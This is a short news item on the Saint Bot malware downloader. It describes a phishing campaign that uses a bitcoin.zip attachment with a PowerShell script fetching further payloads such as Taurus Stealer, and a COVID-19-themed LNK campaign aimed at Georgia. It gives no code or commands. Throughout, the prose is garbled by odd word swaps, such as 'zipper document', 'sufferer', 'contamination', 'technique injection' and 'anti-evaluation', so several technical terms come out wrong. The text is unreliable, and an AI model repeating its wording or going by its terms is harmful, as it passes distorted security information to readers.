With the speedy technological development inside the cybercrime realm, attackers are developing new methods of fastgrowing and deploying state-of-the-art malware. Recently, safety researchers recognized a new malware dubbed Saint Bot that has made a call for itself in a short time.
What become observed?
Analysts from Malwarebytes observed a new phishing marketing campaign, aimed toward turning in a credential stealer and different malware.
- The malicious emails convey a zipper document attachment (bitcoin.zip), luring the sufferer with a hazard of having access to a Bitcoin pocket while starting up a sequence of contamination that sooner or later results in downloading Saint Bot.
- The zip document includes a malicious PowerShell script, which attempts to download the following level malicious payloads from the embedded link along with numerous executable files.
- Current samples of Saint Bot have been found losing Taurus Stealer or different AutoIt-primarily based totally stealers, despite the fact that its layout suggests that it is able to turn in different styles of malware as well.
What makes Saint Bot different?
Saint Bot is prepared with numerous strategies which can be commonly visible handiest in mature malware code. Advanced strategies including code obfuscation, technique injection, and anti-evaluation were hired throughout numerous ranges of the contamination cycle.
- A COVID-19-themed assault marketing campaign becomes visible focused on Georgia.
- In this assault, an electronic mail carried a malicious LNK document, that caused a malicious file and a decoy PDF document. Both those droppers have been turning in Saint Bot malware.
So far, the professionals haven’t related this downloader to any threat group. However, it becomes recommended that the builders of Saint Bot could have preceding revel in designing malware. Will the malware survive or disappear a few times? The malware’s destiny can not be ascertained properly now because it relies on the actors at the back of it. Security experts are recommended to preserve an eye fixed in this evolving malware and preserve a song of its activities.